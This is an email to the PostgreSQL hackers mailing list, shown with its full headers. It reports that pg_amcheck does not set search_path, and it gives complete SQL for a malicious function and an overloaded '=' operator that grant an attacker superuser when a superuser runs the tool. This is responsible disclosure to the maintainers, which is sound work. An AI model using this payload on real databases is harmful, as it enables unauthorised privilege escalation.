Received: from malur.postgresql.org ([217.196.149.56]) by arkaria.postgresql.org with esmtps (TLS1.3) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.96) (envelope-from ) id 1wQPAQ-001XGL-1i for pgsql-hackers@arkaria.postgresql.org; Fri, 22 May 2026 12:39:54 +0000 Received: from localhost ([127.0.0.1] helo=malur.postgresql.org) by malur.postgresql.org with esmtp (Exim 4.96) (envelope-from ) id 1wQPAM-00D56b-1C for pgsql-hackers@arkaria.postgresql.org; Fri, 22 May 2026 12:39:51 +0000 Received: from makus.postgresql.org ([2001:4800:3e1:1::229]) by malur.postgresql.org with esmtps (TLS1.3) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.96) (envelope-from ) id 1wQPAM-00D56T-06 for pgsql-hackers@lists.postgresql.org; Fri, 22 May 2026 12:39:51 +0000 Received: from mail-ed1-x52f.google.com ([2a00:1450:4864:20::52f]) by makus.postgresql.org with esmtps (TLS1.3) tls TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (Exim 4.98.2) (envelope-from ) id 1wQPAL-00000000GoP-1AU4 for pgsql-hackers@lists.postgresql.org; Fri, 22 May 2026 12:39:49 +0000 Received: by mail-ed1-x52f.google.com with SMTP id 4fb4d7f45d1cf-67cd93d8affso9174417a12.2 for ; Fri, 22 May 2026 05:39:49 -0700 (PDT) ARC-Seal: i=1; a=rsa-sha256; t=1779453586; cv=none; d=google.com; s=arc-20240605; b=hNL/vemcjVTx3IsoCst0DSYeYhbLkkj40E8vgbFbgE7xEWgAkqbSMfoCpCzaaWOJsm uFsd2RVNaoCrBQN2pcN4LF+qtAs51+ae9X+N7IggdNSIT374/8TZERmPpStRGmDShVhE ri5zzLpQbQxuL64ohJ9z8Kr75MN8uF0/nzFuc/3mSfkLny9Ii0nCKTL8fT6poU7yobwl R1ZqbIofD+7KNXoLYASnWYDXvMQ0iyhnToChHMnisFK58Ad+qtM2jAxABlKqe6qcFSor x9DMLLgyV+RsEqxS8m3NDP/J1cod6uD9AjUPGFBbQwivy6DCSeNRsqx/wde8BnY80wOx 3X6w== ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20240605; h=to:subject:message-id:date:from:mime-version:dkim-signature; bh=5GEEbdd/s7thSMzW2movFPymNkPOftxyZbSNV0WcNi4=; fh=oWKbGXenJ0W3UaTE5+JHx7ufYGIICxbxa2jY+IM9Itg=; b=cZYpkD0J3pn704mPd/9zLTR4Z+LrNSAi4OEn7nfw5BD2B/e8Tl3yk5/8Bk8ESbZGuM +Bi++Y/68IsUSGEvVPha/APpmrp5KLAUzo4GB2WseSbp2rFo9eDgq4qjmmbpnRYYzaX4 AFS8IuOJ3BYuFdPUvG+hi7tP1t4i+Z4qPR3btq1oelYKoHXUX016JVdI1Qtk0RM6B3HW DBp3R9GDCXEbgHCYuvoQINPwVqkCmkKRQUTWIauPGG9DQKaZ+kiHIo7q7rbEFz4JAYMH Lr8oJMiYTaHLGgQBJBxLMOcDlYVO2N8/1gH34dL0jQ8vPyTY2qQ3jA3OyHTAcTLbQf61 oAWQ==; darn=lists.postgresql.org ARC-Authentication-Results: i=1; mx.google.com; arc=none DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20251104; t=1779453586; x=1780058386; darn=lists.postgresql.org; h=to:subject:message-id:date:from:mime-version:from:to:cc:subject :date:message-id:reply-to; bh=5GEEbdd/s7thSMzW2movFPymNkPOftxyZbSNV0WcNi4=; b=pVhKi/xJwzr+Tuaxk2W8jqr179Ygr9qxaosubh/0uBEPek9pIW41Zrg8oCMb1q0RCb jRwK6wbNQjipFTgcRP3t2Xm21qRRfSvLuR6vjGCrgvT63knLiiCNS0x5hFoL2nxOGniV aaPggCJkXF7LBALuOjffkAvl3RrYG9q5QDqA14VvEen99BDuX2HLOGhSyYdWfPEzRqYF uJqgxtsAeHtlmNxgpA5PSLTCHAHe2P2lhUIBIDldWICwi+tf6Q1OCrmqSksssXYuccJW lF+JEhDikDks7UaHuzqiV6A5JO6SB4Tv6iqA50YmcXBnzsWkd/UFI9whkg6R53xdoJJC CwBg== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20251104; t=1779453586; x=1780058386; h=to:subject:message-id:date:from:mime-version:x-gm-gg :x-gm-message-state:from:to:cc:subject:date:message-id:reply-to; bh=5GEEbdd/s7thSMzW2movFPymNkPOftxyZbSNV0WcNi4=; b=oCIaBd0TjzAwyCW2Rx0t5wW1CXQHYD59H8y8sdLB8RNvH4grEAonXUG5kYUey9fvA2 mawg8MjeFNx010nVf47Ms1TzgVX8yt/ZEDSpgZz2T7BX9uLcUPJffEe/vvlv1DsKdLU6 x7R1ov3KO6yFt/YMdM40pj02l9NNdEooJ2ok8TJXocBEBQd5mMC9v2bWSohCx3oVXiMg i3uj9XEVENV2ybAR4EuJIQnz+a3VW2kOcyBqcMIM5ALXoOmbIlSLIIe/PQdPPqH6dW2X 2y5FGjZsWObgE+fNYvhu4S+56eG51cC4dlEmxWPEJusla7qfiDxhLtoa9yy/j1jS3TAO Y9WQ== X-Gm-Message-State: AOJu0Ywf02MyhsV/dP0ycrqAjcVClUmiCFuNU0WjSUMpJ2RoHj3Ug/3Q V6H3fCk1Uwg7G2PRoMrXdb7uyp1LdLErCMWwM0ZzSGbLXJxc6uv2w1y8Ihq9FBOpKxmuUOnZ1Vm a+U9+4zmHRbs8Csyt2uuBudJqSIDsLfsEZc0n X-Gm-Gg: Acq92OGwnGrpPOswY/TFviLYk/euBMbi1rYj1pn+42dMfvg1TjOZaCSk6cE1ENFGAiQ 5+5z05bcKjmZRagkC9xKdUTzG4s0hhHa9rt5M3lytKX7GVAhuI8NlAlwRtlLCVNaQpqaR1cQXnv PXokkVs75BCxNSDITxE9Mfi98b8gFec2OTEHuOjaysUZyLnSvYLPhrCDJQXBlAksGJqdqw+ycxh 4/DiT3y5dXiOLddKI0MwBNIpKa+dONBmUOdkxwOujnGk8/tvJ62ztNh+5rkfbPAReYPSMqg3eAc 557o2F+AAikiqPNJR/AM X-Received: by 2002:a17:906:5a61:b0:bd5:b26:52d6 with SMTP id a640c23a62f3a-bdd22a3d4f5mr147536966b.5.1779453585953; Fri, 22 May 2026 05:39:45 -0700 (PDT) MIME-Version: 1.0 From: Pavel Borisov Date: Fri, 22 May 2026 16:39:33 +0400 X-Gm-Features: AVHnY4KsOEQ_wJKYAjhDNyBJNGluivkr6f4DMpHCz9PB5l6l_qQN1agxj3eJw1Q Message-ID: Subject: Permission elevation by pg_amcheck operator overloading via search_path possible? To: Postgres hackers Content-Type: text/plain; charset="UTF-8" List-Id: List-Help: List-Subscribe: List-Post: List-Owner: List-Archive: Archived-At: Precedence: bulk Hi, hackers! As I see pg_amcheck doesn't set search_path. It runs SQL queries like: SELECT n.nspname, x.extversion FROM pg_catalog.pg_extension x JOIN pg_catalog.pg_namespace n ON x.extnamespace = n.oid WHERE x.extname = 'amcheck' Let's suppose search_path for database is set: search_path = 'myschema, pg_catalog' Then CREATE FUNCTION myschema.evil(name, name) RETURNS bool AS $$ ALTER USER attacker WITH SUPERUSER; SELECT $1 OPERATOR(pg_catalog.=) $2; $$ LANGUAGE sql; CREATE OPERATOR myschema.= (LEFTARG = name, RIGHTARG = name, PROCEDURE = myschema.evil); Then run pg_amcheck as superuser. So the user attacker can become SUPERUSER. Is this scenario worth fixing? Regards, Pavel Borisov Supabase